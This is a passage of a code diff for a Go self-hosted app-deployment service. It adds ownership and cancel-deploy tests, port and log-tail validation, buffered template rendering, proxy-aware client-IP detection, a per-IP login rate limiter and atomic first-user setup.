-	request = addChiURLParams(request, map[string]string{
-		"id":      app2.ID,
-		"labelID": strconv.FormatInt(label.ID, 10),
+			found, findErr := models.FindLabel(context.Background(), tc.database, resourceID)
+			require.NoError(t, findErr)
+			assert.NotNil(t, found, "label should still exist after IDOR attempt")
+		},
 	})
-	recorder := httptest.NewRecorder()
-
-	handler := testCtx.handlers.HandleLabelDelete()
-	handler.ServeHTTP(recorder, request)
-
-	assert.Equal(t, http.StatusNotFound, recorder.Code)
-
-	// Verify the label was NOT deleted
-	found, err := models.FindLabel(context.Background(), testCtx.database, label.ID)
-	require.NoError(t, err)
-	assert.NotNil(t, found, "label should still exist after IDOR attempt")
 }
 
 // TestDeleteVolumeOwnershipVerification tests that deleting a volume
@@ -656,6 +684,47 @@ func TestDeletePortOwnershipVerification(t *testing.T) {
 	assert.NotNil(t, found, "port should still exist after IDOR attempt")
 }
 
+func TestHandleCancelDeployRedirects(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	createdApp := createTestApp(t, testCtx, "cancel-deploy-app")
+
+	request := httptest.NewRequest(
+		http.MethodPost,
+		"/apps/"+createdApp.ID+"/deployments/cancel",
+		nil,
+	)
+	request = addChiURLParams(request, map[string]string{"id": createdApp.ID})
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleCancelDeploy()
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusSeeOther, recorder.Code)
+	assert.Equal(t, "/apps/"+createdApp.ID, recorder.Header().Get("Location"))
+}
+
+func TestHandleCancelDeployReturns404ForUnknownApp(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	request := httptest.NewRequest(
+		http.MethodPost,
+		"/apps/nonexistent/deployments/cancel",
+		nil,
+	)
+	request = addChiURLParams(request, map[string]string{"id": "nonexistent"})
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleCancelDeploy()
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusNotFound, recorder.Code)
+}
+
 func TestHandleWebhookReturns404ForUnknownSecret(t *testing.T) {
 	t.Parallel()
 

internal/handlers/port_validation_test.go

@@ -0,0 +1,39 @@
+package handlers //nolint:testpackage // tests unexported parsePortValues function
+
+import "testing"
+
+func TestParsePortValues(t *testing.T) {
+	t.Parallel()
+
+	tests := []struct {
+		name      string
+		host      string
+		container string
+		wantHost  int
+		wantCont  int
+		wantValid bool
+	}{
+		{"valid ports", "8080", "80", 8080, 80, true},
+		{"port 1", "1", "1", 1, 1, true},
+		{"port 65535", "65535", "65535", 65535, 65535, true},
+		{"host port above 65535", "99999", "80", 0, 0, false},
+		{"container port above 65535", "80", "99999", 0, 0, false},
+		{"both ports above 65535", "70000", "70000", 0, 0, false},
+		{"zero port", "0", "80", 0, 0, false},
+		{"negative port", "-1", "80", 0, 0, false},
+		{"non-numeric", "abc", "80", 0, 0, false},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			host, cont, valid := parsePortValues(tt.host, tt.container)
+			if host != tt.wantHost || cont != tt.wantCont || valid != tt.wantValid {
+				t.Errorf("parsePortValues(%q, %q) = (%d, %d, %v), want (%d, %d, %v)",
+					tt.host, tt.container, host, cont, valid,
+					tt.wantHost, tt.wantCont, tt.wantValid)
+			}
+		})
+	}
+}

internal/handlers/render_template_test.go

@@ -0,0 +1,73 @@
+package handlers_test
+
+import (
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+// TestRenderTemplateBuffersOutput verifies that successful template rendering
+// produces a complete HTML response (not partial/corrupt).
+func TestRenderTemplateBuffersOutput(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	// The setup page is simple and has no DB dependencies
+	request := httptest.NewRequest(http.MethodGet, "/setup", nil)
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleSetupGET()
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusOK, recorder.Code)
+
+	body := recorder.Body.String()
+	// A properly buffered response should contain the closing </html> tag,
+	// proving the full template was rendered before being sent.
+	assert.Contains(t, body, "</html>")
+	// Should NOT contain the error text that would be appended on failure
+	assert.NotContains(t, body, "Internal Server Error")
+}
+
+// TestDashboardRenderTemplateBuffersOutput verifies the dashboard handler
+// also uses buffered template rendering.
+func TestDashboardRenderTemplateBuffersOutput(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	request := httptest.NewRequest(http.MethodGet, "/", nil)
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleDashboard()
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusOK, recorder.Code)
+
+	body := recorder.Body.String()
+	assert.Contains(t, body, "</html>")
+	assert.NotContains(t, body, "Internal Server Error")
+}
+
+// TestLoginRenderTemplateBuffersOutput verifies the login handler
+// uses buffered template rendering.
+func TestLoginRenderTemplateBuffersOutput(t *testing.T) {
+	t.Parallel()
+
+	testCtx := setupTestHandlers(t)
+
+	request := httptest.NewRequest(http.MethodGet, "/login", nil)
+	recorder := httptest.NewRecorder()
+
+	handler := testCtx.handlers.HandleLoginGET()
+	handler.ServeHTTP(recorder, request)
+
+	assert.Equal(t, http.StatusOK, recorder.Code)
+
+	body := recorder.Body.String()
+	assert.Contains(t, body, "</html>")
+	assert.NotContains(t, body, "Internal Server Error")
+}

internal/handlers/setup.go

@@ -18,11 +18,7 @@ func (h *Handlers) HandleSetupGET() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
 		data := h.addGlobals(map[string]any{}, request)
 
-		err := tmpl.ExecuteTemplate(writer, "setup.html", data)
-		if err != nil {
-			h.log.Error("template execution failed", "error", err)
-			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
-		}
+		h.renderTemplate(writer, tmpl, "setup.html", data)
 	}
 }
 
@@ -62,7 +58,7 @@ func (h *Handlers) renderSetupError(
 		"Username": username,
 		"Error":    errorMsg,
 	}, request)
-	_ = tmpl.ExecuteTemplate(writer, "setup.html", data)
+	h.renderTemplate(writer, tmpl, "setup.html", data)
 }
 
 // HandleSetupPOST handles the setup form submission.

internal/handlers/tail_validation_test.go

@@ -0,0 +1,40 @@
+package handlers_test
+
+import (
+	"testing"
+
+	"git.eeqj.de/sneak/upaas/internal/handlers"
+)
+
+func TestSanitizeTail(t *testing.T) {
+	t.Parallel()
+
+	tests := []struct {
+		name     string
+		input    string
+		expected string
+	}{
+		{"empty uses default", "", handlers.DefaultLogTail},
+		{"valid small number", "50", "50"},
+		{"valid max boundary", "500", "500"},
+		{"exceeds max clamped", "501", "500"},
+		{"very large clamped", "999999", "500"},
+		{"non-numeric uses default", "abc", handlers.DefaultLogTail},
+		{"all keyword uses default", "all", handlers.DefaultLogTail},
+		{"negative uses default", "-1", handlers.DefaultLogTail},
+		{"zero uses default", "0", handlers.DefaultLogTail},
+		{"float uses default", "1.5", handlers.DefaultLogTail},
+		{"one is valid", "1", "1"},
+	}
+
+	for _, tc := range tests {
+		t.Run(tc.name, func(t *testing.T) {
+			t.Parallel()
+
+			got := handlers.SanitizeTail(tc.input)
+			if got != tc.expected {
+				t.Errorf("sanitizeTail(%q) = %q, want %q", tc.input, got, tc.expected)
+			}
+		})
+	}
+}

internal/middleware/middleware.go

@@ -3,8 +3,12 @@ package middleware
 
 import (
 	"log/slog"
+	"math"
 	"net"
 	"net/http"
+	"strconv"
+	"strings"
+	"sync"
 	"time"
 
 	"github.com/99designs/basicauth-go"
@@ -12,6 +16,7 @@ import (
 	"github.com/go-chi/cors"
 	"github.com/gorilla/csrf"
 	"go.uber.org/fx"
+	"golang.org/x/time/rate"
 
 	"git.eeqj.de/sneak/upaas/internal/config"
 	"git.eeqj.de/sneak/upaas/internal/globals"
@@ -86,7 +91,7 @@ func (m *Middleware) Logging() func(http.Handler) http.Handler {
 					"request_id", reqID,
 					"referer", request.Referer(),
 					"proto", request.Proto,
-					"remoteIP", ipFromHostPort(request.RemoteAddr),
+					"remoteIP", realIP(request),
 					"status", lrw.statusCode,
 					"latency_ms", latency.Milliseconds(),
 				)
@@ -106,6 +111,71 @@ func ipFromHostPort(hostPort string) string {
 	return host
 }
 
+// trustedProxyNets are RFC1918 and loopback CIDRs whose proxy headers we trust.
+//
+//nolint:gochecknoglobals // package-level constant nets parsed once
+var trustedProxyNets = func() []*net.IPNet {
+	cidrs := []string{
+		"10.0.0.0/8",
+		"172.16.0.0/12",
+		"192.168.0.0/16",
+		"127.0.0.0/8",
+		"::1/128",
+		"fc00::/7",
+	}
+
+	nets := make([]*net.IPNet, 0, len(cidrs))
+
+	for _, cidr := range cidrs {
+		_, n, _ := net.ParseCIDR(cidr)
+		nets = append(nets, n)
+	}
+
+	return nets
+}()
+
+// isTrustedProxy reports whether ip is in an RFC1918, loopback, or ULA range.
+func isTrustedProxy(ip net.IP) bool {
+	for _, n := range trustedProxyNets {
+		if n.Contains(ip) {
+			return true
+		}
+	}
+
+	return false
+}
+
+// realIP extracts the client's real IP address from the request.
+// Proxy headers (X-Real-IP, X-Forwarded-For) are only trusted when the
+// direct connection originates from an RFC1918/loopback address.
+// Otherwise, headers are ignored and RemoteAddr is used (fail closed).
+func realIP(r *http.Request) string {
+	addr := ipFromHostPort(r.RemoteAddr)
+	remoteIP := net.ParseIP(addr)
+
+	// Only trust proxy headers from private/loopback sources.
+	if remoteIP == nil || !isTrustedProxy(remoteIP) {
+		return addr
+	}
+
+	// 1. X-Real-IP (set by Traefik/nginx)
+	if ip := strings.TrimSpace(r.Header.Get("X-Real-IP")); ip != "" {
+		return ip
+	}
+
+	// 2. X-Forwarded-For: take the first (leftmost/client) IP
+	if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
+		if parts := strings.SplitN(xff, ",", 2); len(parts) > 0 { //nolint:mnd
+			if ip := strings.TrimSpace(parts[0]); ip != "" {
+				return ip
+			}
+		}
+	}
+
+	// 3. Fall back to RemoteAddr
+	return addr
+}
+
 // CORS returns CORS middleware.
 func (m *Middleware) CORS() func(http.Handler) http.Handler {
 	return cors.Handler(cors.Options{
@@ -162,6 +232,113 @@ func (m *Middleware) CSRF() func(http.Handler) http.Handler {
 	)
 }
 
+// loginRateLimit configures the login rate limiter.
+const (
+	loginRateLimit      = rate.Limit(5.0 / 60.0) // 5 requests per 60 seconds
+	loginBurst          = 5                      // allow burst of 5
+	limiterExpiry       = 10 * time.Minute       // evict entries not seen in 10 minutes
+	limiterCleanupEvery = 1 * time.Minute        // sweep interval
+)
+
+// ipLimiterEntry stores a rate limiter with its last-seen timestamp.
+type ipLimiterEntry struct {
+	limiter  *rate.Limiter
+	lastSeen time.Time
+}
+
+// ipLimiter tracks per-IP rate limiters for login attempts with automatic
+// eviction of stale entries to prevent unbounded memory growth.
+type ipLimiter struct {
+	mu        sync.Mutex
+	limiters  map[string]*ipLimiterEntry
+	lastSweep time.Time
+}
+
+func newIPLimiter() *ipLimiter {
+	return &ipLimiter{
+		limiters:  make(map[string]*ipLimiterEntry),
+		lastSweep: time.Now(),
+	}
+}
+
+// sweep removes entries not seen within limiterExpiry. Must be called with mu held.
+func (i *ipLimiter) sweep(now time.Time) {
+	for ip, entry := range i.limiters {
+		if now.Sub(entry.lastSeen) > limiterExpiry {
+			delete(i.limiters, ip)
+		}
+	}
+
+	i.lastSweep = now
+}
+
+func (i *ipLimiter) getLimiter(ip string) *rate.Limiter {
+	i.mu.Lock()
+	defer i.mu.Unlock()
+
+	now := time.Now()
+
+	// Lazy sweep: clean up stale entries periodically.
+	if now.Sub(i.lastSweep) >= limiterCleanupEvery {
+		i.sweep(now)
+	}
+
+	entry, exists := i.limiters[ip]
+	if !exists {
+		entry = &ipLimiterEntry{
+			limiter: rate.NewLimiter(loginRateLimit, loginBurst),
+		}
+		i.limiters[ip] = entry
+	}
+
+	entry.lastSeen = now
+
+	return entry.limiter
+}
+
+// loginLimiter is the singleton IP rate limiter for login attempts.
+//
+//nolint:gochecknoglobals // intentional singleton for rate limiting state
+var loginLimiter = newIPLimiter()
+
+// LoginRateLimit returns middleware that rate-limits login attempts per IP.
+// It allows 5 attempts per minute and returns 429 Too Many Requests when exceeded.
+func (m *Middleware) LoginRateLimit() func(http.Handler) http.Handler {
+	return func(next http.Handler) http.Handler {
+		return http.HandlerFunc(func(
+			writer http.ResponseWriter,
+			request *http.Request,
+		) {
+			ip := realIP(request)
+			limiter := loginLimiter.getLimiter(ip)
+
+			if !limiter.Allow() {
+				m.log.WarnContext(request.Context(), "login rate limit exceeded",
+					"remoteIP", ip,
+				)
+
+				// Compute seconds until the next token is available.
+				reservation := limiter.Reserve()
+				delay := reservation.Delay()
+				reservation.Cancel()
+
+				retryAfter := max(int(math.Ceil(delay.Seconds())), 1)
+				writer.Header().Set("Retry-After", strconv.Itoa(retryAfter))
+
+				http.Error(
+					writer,
+					"Too Many Requests",
+					http.StatusTooManyRequests,
+				)
+
+				return
+			}
+
+			next.ServeHTTP(writer, request)
+		})
+	}
+}
+
 // SetupRequired returns middleware that redirects to setup if no user exists.
 func (m *Middleware) SetupRequired() func(http.Handler) http.Handler {
 	return func(next http.Handler) http.Handler {

internal/middleware/ratelimit_test.go

@@ -0,0 +1,141 @@
+package middleware //nolint:testpackage // tests unexported types and globals
+
+import (
+	"log/slog"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+
+	"github.com/stretchr/testify/assert"
+
+	"git.eeqj.de/sneak/upaas/internal/config"
+)
+
+func newTestMiddleware(t *testing.T) *Middleware {
+	t.Helper()
+
+	return &Middleware{
+		log: slog.Default(),
+		params: &Params{
+			Config: &config.Config{},
+		},
+	}
+}
+
+//nolint:paralleltest // mutates global loginLimiter
+func TestLoginRateLimitAllowsUpToBurst(t *testing.T) {
+	// Reset the global limiter to get clean state
+	loginLimiter = newIPLimiter()
+
+	mw := newTestMiddleware(t)
+
+	handler := mw.LoginRateLimit()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	// First 5 requests should succeed (burst)
+	for i := range 5 {
+		req := httptest.NewRequest(http.MethodPost, "/login", nil)
+		req.RemoteAddr = "192.168.1.1:12345"
+		rec := httptest.NewRecorder()
+		handler.ServeHTTP(rec, req)
+		assert.Equal(t, http.StatusOK, rec.Code, "request %d should succeed", i+1)
+	}
+
+	// 6th request should be rate limited
+	req := httptest.NewRequest(http.MethodPost, "/login", nil)
+	req.RemoteAddr = "192.168.1.1:12345"
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+	assert.Equal(t, http.StatusTooManyRequests, rec.Code, "6th request should be rate limited")
+}
+
+//nolint:paralleltest // mutates global loginLimiter
+func TestLoginRateLimitIsolatesIPs(t *testing.T) {
+	loginLimiter = newIPLimiter()
+
+	mw := newTestMiddleware(t)
+
+	handler := mw.LoginRateLimit()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	// Exhaust IP1's budget
+	for range 5 {
+		req := httptest.NewRequest(http.MethodPost, "/login", nil)
+		req.RemoteAddr = "10.0.0.1:1234"
+		rec := httptest.NewRecorder()
+		handler.ServeHTTP(rec, req)
+	}
+
+	// IP1 should be blocked
+	req := httptest.NewRequest(http.MethodPost, "/login", nil)
+	req.RemoteAddr = "10.0.0.1:1234"
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+	assert.Equal(t, http.StatusTooManyRequests, rec.Code)
+
+	// IP2 should still work
+	req2 := httptest.NewRequest(http.MethodPost, "/login", nil)
+	req2.RemoteAddr = "10.0.0.2:1234"
+	rec2 := httptest.NewRecorder()
+	handler.ServeHTTP(rec2, req2)
+	assert.Equal(t, http.StatusOK, rec2.Code, "different IP should not be rate limited")
+}
+
+//nolint:paralleltest // mutates global loginLimiter
+func TestLoginRateLimitReturns429Body(t *testing.T) {
+	loginLimiter = newIPLimiter()
+
+	mw := newTestMiddleware(t)
+
+	handler := mw.LoginRateLimit()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+
+	// Exhaust burst
+	for range 5 {
+		req := httptest.NewRequest(http.MethodPost, "/login", nil)
+		req.RemoteAddr = "172.16.0.1:5555"
+		rec := httptest.NewRecorder()
+		handler.ServeHTTP(rec, req)
+	}
+
+	req := httptest.NewRequest(http.MethodPost, "/login", nil)
+	req.RemoteAddr = "172.16.0.1:5555"
+	rec := httptest.NewRecorder()
+	handler.ServeHTTP(rec, req)
+	assert.Equal(t, http.StatusTooManyRequests, rec.Code)
+	assert.Contains(t, rec.Body.String(), "Too Many Requests")
+	assert.NotEmpty(t, rec.Header().Get("Retry-After"), "should include Retry-After header")
+}
+
+func TestIPLimiterEvictsStaleEntries(t *testing.T) {
+	t.Parallel()
+
+	il := newIPLimiter()
+
+	// Add an entry and backdate its lastSeen
+	il.mu.Lock()
+	il.limiters["1.2.3.4"] = &ipLimiterEntry{
+		limiter:  nil,
+		lastSeen: time.Now().Add(-15 * time.Minute),
+	}
+	il.limiters["5.6.7.8"] = &ipLimiterEntry{
+		limiter:  nil,
+		lastSeen: time.Now(),
+	}
+	il.mu.Unlock()
+
+	// Trigger sweep
+	il.mu.Lock()
+	il.sweep(time.Now())
+	il.mu.Unlock()
+
+	il.mu.Lock()
+	defer il.mu.Unlock()
+
+	assert.NotContains(t, il.limiters, "1.2.3.4", "stale entry should be evicted")
+	assert.Contains(t, il.limiters, "5.6.7.8", "fresh entry should remain")
+}

internal/middleware/realip_test.go

@@ -0,0 +1,157 @@
+package middleware //nolint:testpackage // tests unexported realIP function
+
+import (
+	"context"
+	"net"
+	"net/http"
+	"testing"
+)
+
+func TestRealIP(t *testing.T) { //nolint:funlen // table-driven test
+	t.Parallel()
+
+	tests := []struct {
+		name       string
+		remoteAddr string
+		xRealIP    string
+		xff        string
+		want       string
+	}{
+		// === Trusted proxy (RFC1918 / loopback) — headers ARE honoured ===
+		{
+			name:       "trusted: X-Real-IP from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xRealIP:    "203.0.113.5",
+			xff:        "198.51.100.1, 10.0.0.1",
+			want:       "203.0.113.5",
+		},
+		{
+			name:       "trusted: XFF from 10.x when no X-Real-IP",
+			remoteAddr: "10.0.0.1:1234",
+			xff:        "198.51.100.1, 10.0.0.1",
+			want:       "198.51.100.1",
+		},
+		{
+			name:       "trusted: XFF single IP from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xff:        "203.0.113.10",
+			want:       "203.0.113.10",
+		},
+		{
+			name:       "trusted: falls back to RemoteAddr (192.168.x)",
+			remoteAddr: "192.168.1.1:5678",
+			want:       "192.168.1.1",
+		},
+		{
+			name:       "trusted: RemoteAddr without port",
+			remoteAddr: "192.168.1.1",
+			want:       "192.168.1.1",
+		},
+		{
+			name:       "trusted: X-Real-IP with whitespace from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xRealIP:    "  203.0.113.5  ",
+			want:       "203.0.113.5",
+		},
+		{
+			name:       "trusted: XFF with whitespace from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xff:        "  198.51.100.1 , 10.0.0.1",
+			want:       "198.51.100.1",
+		},
+		{
+			name:       "trusted: empty X-Real-IP falls through to XFF from 10.x",
+			remoteAddr: "10.0.0.1:1234",
+			xRealIP:    "  ",
+			xff:        "198.51.100.1",
+			want:       "198.51.100.1",
+		},
+		{
+			name:       "trusted: loopback honours X-Real-IP",
+			remoteAddr: "127.0.0.1:9999",
+			xRealIP:    "93.184.216.34",
+			want:       "93.184.216.34",
+		},
+		{
+			name:       "trusted: 172.16.x honours XFF",
+			remoteAddr: "172.16.0.1:4321",
+			xff:        "8.8.8.8",
+			want:       "8.8.8.8",
+		},
+
+		// === Untrusted proxy (public IP) — headers IGNORED, use RemoteAddr ===
+		{
+			name:       "untrusted: X-Real-IP ignored from public IP",
+			remoteAddr: "203.0.113.50:1234",
+			xRealIP:    "10.0.0.1",
+			want:       "203.0.113.50",
+		},
+		{
+			name:       "untrusted: XFF ignored from public IP",
+			remoteAddr: "198.51.100.99:5678",
+			xff:        "10.0.0.1, 192.168.1.1",
+			want:       "198.51.100.99",
+		},
+		{
+			name:       "untrusted: both headers ignored from public IP",
+			remoteAddr: "8.8.8.8:443",
+			xRealIP:    "1.2.3.4",
+			xff:        "5.6.7.8",
+			want:       "8.8.8.8",
+		},
+		{
+			name:       "untrusted: no headers, public RemoteAddr",
+			remoteAddr: "93.184.216.34:8080",
+			want:       "93.184.216.34",
+		},
+		{
+			name:       "untrusted: public RemoteAddr without port",
+			remoteAddr: "93.184.216.34",
+			want:       "93.184.216.34",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			t.Parallel()
+
+			req, _ := http.NewRequestWithContext(context.Background(), http.MethodGet, "/", nil)
+			req.RemoteAddr = tt.remoteAddr
+
+			if tt.xRealIP != "" {
+				req.Header.Set("X-Real-IP", tt.xRealIP)
+			}
+
+			if tt.xff != "" {
+				req.Header.Set("X-Forwarded-For", tt.xff)
+			}
+
+			got := realIP(req)
+			if got != tt.want {
+				t.Errorf("realIP() = %q, want %q", got, tt.want)
+			}
+		})
+	}
+}
+
+func TestIsTrustedProxy(t *testing.T) {
+	t.Parallel()
+
+	trusted := []string{"10.0.0.1", "10.255.255.255", "172.16.0.1", "172.31.255.255",
+		"192.168.0.1", "192.168.255.255", "127.0.0.1", "127.255.255.255", "::1"}
+	untrusted := []string{"8.8.8.8", "203.0.113.1", "172.32.0.1", "11.0.0.1", "2001:db8::1"}
+
+	for _, addr := range trusted {
+		ip := net.ParseIP(addr)
+		if !isTrustedProxy(ip) {
+			t.Errorf("expected %s to be trusted", addr)
+		}
+	}
+
+	for _, addr := range untrusted {
+		ip := net.ParseIP(addr)
+		if isTrustedProxy(ip) {
+			t.Errorf("expected %s to be untrusted", addr)
+		}
+	}
+}

internal/models/app.go

@@ -14,7 +14,7 @@ import (
 const appColumns = `id, name, repo_url, branch, dockerfile_path, webhook_secret,
 			ssh_private_key, ssh_public_key, image_id, status,
 			docker_network, ntfy_topic, slack_webhook, webhook_secret_hash,
-			created_at, updated_at`
+			previous_image_id, created_at, updated_at`
 
 // AppStatus represents the status of an app.
 type AppStatus string
@@ -32,22 +32,23 @@ const (
 type App struct {
 	db *database.Database
 
-	ID             string
-	Name           string
-	RepoURL        string
-	Branch         string
-	DockerfilePath string
+	ID                string
+	Name              string
+	RepoURL           string
+	Branch            string
+	DockerfilePath    string
 	WebhookSecret     string
 	WebhookSecretHash string
 	SSHPrivateKey     string
-	SSHPublicKey   string
-	ImageID        sql.NullString
-	Status         AppStatus
-	DockerNetwork  sql.NullString
-	NtfyTopic      sql.NullString
-	SlackWebhook   sql.NullString
-	CreatedAt      time.Time
-	UpdatedAt      time.Time
+	SSHPublicKey      string
+	ImageID           sql.NullString
+	PreviousImageID   sql.NullString
+	Status            AppStatus
+	DockerNetwork     sql.NullString
+	NtfyTopic         sql.NullString
+	SlackWebhook      sql.NullString
+	CreatedAt         time.Time
+	UpdatedAt         time.Time
 }
 
 // NewApp creates a new App with a database reference.
@@ -140,13 +141,15 @@ func (a *App) insert(ctx context.Context) error {
 		INSERT INTO apps (
 			id, name, repo_url, branch, dockerfile_path, webhook_secret,
 			ssh_private_key, ssh_public_key, image_id, status,
-			docker_network, ntfy_topic, slack_webhook, webhook_secret_hash
-		) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`
+			docker_network, ntfy_topic, slack_webhook, webhook_secret_hash,
+			previous_image_id
+		) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`
 
 	_, err := a.db.Exec(ctx, query,
 		a.ID, a.Name, a.RepoURL, a.Branch, a.DockerfilePath, a.WebhookSecret,
 		a.SSHPrivateKey, a.SSHPublicKey, a.ImageID, a.Status,
 		a.DockerNetwork, a.NtfyTopic, a.SlackWebhook, a.WebhookSecretHash,
+		a.PreviousImageID,
 	)
 	if err != nil {
 		return err
@@ -161,6 +164,7 @@ func (a *App) update(ctx context.Context) error {
 			name = ?, repo_url = ?, branch = ?, dockerfile_path = ?,
 			image_id = ?, status = ?,
 			docker_network = ?, ntfy_topic = ?, slack_webhook = ?,
+			previous_image_id = ?,
 			updated_at = CURRENT_TIMESTAMP
 		WHERE id = ?`
 
@@ -168,6 +172,7 @@ func (a *App) update(ctx context.Context) error {
 		a.Name, a.RepoURL, a.Branch, a.DockerfilePath,
 		a.ImageID, a.Status,
 		a.DockerNetwork, a.NtfyTopic, a.SlackWebhook,
+		a.PreviousImageID,
 		a.ID,
 	)
 
@@ -182,6 +187,7 @@ func (a *App) scan(row *sql.Row) error {
 		&a.ImageID, &a.Status,
 		&a.DockerNetwork, &a.NtfyTopic, &a.SlackWebhook,
 		&a.WebhookSecretHash,
+		&a.PreviousImageID,
 		&a.CreatedAt, &a.UpdatedAt,
 	)
 }
@@ -199,6 +205,7 @@ func scanApps(appDB *database.Database, rows *sql.Rows) ([]*App, error) {
 			&app.ImageID, &app.Status,
 			&app.DockerNetwork, &app.NtfyTopic, &app.SlackWebhook,
 			&app.WebhookSecretHash,
+			&app.PreviousImageID,
 			&app.CreatedAt, &app.UpdatedAt,
 		)
 		if scanErr != nil {

internal/models/deployment.go

@@ -19,6 +19,7 @@ const (
 	DeploymentStatusDeploying DeploymentStatus = "deploying"
 	DeploymentStatusSuccess   DeploymentStatus = "success"
 	DeploymentStatusFailed    DeploymentStatus = "failed"
+	DeploymentStatusCancelled DeploymentStatus = "cancelled"
 )
 
 // Display constants.

internal/models/user.go

@@ -135,6 +135,61 @@ func FindUserByUsername(
 	return user, nil
 }
 
+// CreateFirstUser atomically checks that no users exist and inserts the admin user.
+// Returns nil, nil if a user already exists (setup already completed).
+func CreateFirstUser(
+	ctx context.Context,
+	db *database.Database,
+	username, passwordHash string,
+) (*User, error) {
+	tx, err := db.BeginTx(ctx, nil)
+	if err != nil {
+		return nil, fmt.Errorf("beginning transaction: %w", err)
+	}
+
+	defer func() { _ = tx.Rollback() }()
+
+	// Check if any user exists within the transaction.
+	var count int
+
+	err = tx.QueryRowContext(ctx, "SELECT COUNT(*) FROM users").Scan(&count)
+	if err != nil {
+		return nil, fmt.Errorf("checking user count: %w", err)
+	}
+
+	if count > 0 {
+		return nil, nil //nolint:nilnil // nil,nil signals setup already completed
+	}
+
+	result, err := tx.ExecContext(ctx,
+		"INSERT INTO users (username, password_hash) VALUES (?, ?)",
+		username, passwordHash,
+	)
+	if err != nil {
+		return nil, fmt.Errorf("inserting user: %w", err)
+	}
+
+	err = tx.Commit()
+	if err != nil {
+		return nil, fmt.Errorf("committing transaction: %w", err)
+	}
+
+	insertID, err := result.LastInsertId()
+	if err != nil {
+		return nil, fmt.Errorf("getting last insert id: %w", err)
+	}
+
+	user := NewUser(db)
+	user.ID = insertID
+
+	err = user.Reload(ctx)
+	if err != nil {
+		return nil, fmt.Errorf("reloading user: %w", err)
+	}
+
+	return user, nil
+}
+
 // UserExists checks if any user exists in the database.
 func UserExists(ctx context.Context, db *database.Database) (bool, error) {
 	var count int

internal/server/routes.go

@@ -46,7 +46,7 @@ func (s *Server) SetupRoutes() {
 
 		// Public routes
 		r.Get("/login", s.handlers.HandleLoginGET())
-		r.Post("/login", s.handlers.HandleLoginPOST())
+		r.With(s.mw.LoginRateLimit()).Post("/login", s.handlers.HandleLoginPOST())
 		r.Get("/setup", s.handlers.HandleSetupGET())
 		r.Post("/setup", s.handlers.HandleSetupPOST())
 
@@ -54,46 +54,48 @@ func (s *Server) SetupRoutes() {
 		r.Group(func(r chi.Router) {
 			r.Use(s.mw.SessionAuth())
 
-		// Dashboard
-		r.Get("/", s.handlers.HandleDashboard())
+			// Dashboard
+			r.Get("/", s.handlers.HandleDashboard())
 
-		// Logout
-		r.Post("/logout", s.handlers.HandleLogout())
+			// Logout
+			r.Post("/logout", s.handlers.HandleLogout())
 
-		// App routes
-		r.Get("/apps/new", s.handlers.HandleAppNew())
-		r.Post("/apps", s.handlers.HandleAppCreate())
-		r.Get("/apps/{id}", s.handlers.HandleAppDetail())
-		r.Get("/apps/{id}/edit", s.handlers.HandleAppEdit())
-		r.Post("/apps/{id}", s.handlers.HandleAppUpdate())
-		r.Post("/apps/{id}/delete", s.handlers.HandleAppDelete())
-		r.Post("/apps/{id}/deploy", s.handlers.HandleAppDeploy())
-		r.Get("/apps/{id}/deployments", s.handlers.HandleAppDeployments())
-		r.Get("/apps/{id}/deployments/{deploymentID}/logs", s.handlers.HandleDeploymentLogsAPI())
-		r.Get("/apps/{id}/deployments/{deploymentID}/download", s.handlers.HandleDeploymentLogDownload())
-		r.Get("/apps/{id}/logs", s.handlers.HandleAppLogs())
-		r.Get("/apps/{id}/container-logs", s.handlers.HandleContainerLogsAPI())
-		r.Get("/apps/{id}/status", s.handlers.HandleAppStatusAPI())
-		r.Get("/apps/{id}/recent-deployments", s.handlers.HandleRecentDeploymentsAPI())
-		r.Post("/apps/{id}/restart", s.handlers.HandleAppRestart())
-		r.Post("/apps/{id}/stop", s.handlers.HandleAppStop())
-		r.Post("/apps/{id}/start", s.handlers.HandleAppStart())
+			// App routes
+			r.Get("/apps/new", s.handlers.HandleAppNew())
+			r.Post("/apps", s.handlers.HandleAppCreate())
+			r.Get("/apps/{id}", s.handlers.HandleAppDetail())
+			r.Get("/apps/{id}/edit", s.handlers.HandleAppEdit())
+			r.Post("/apps/{id}", s.handlers.HandleAppUpdate())
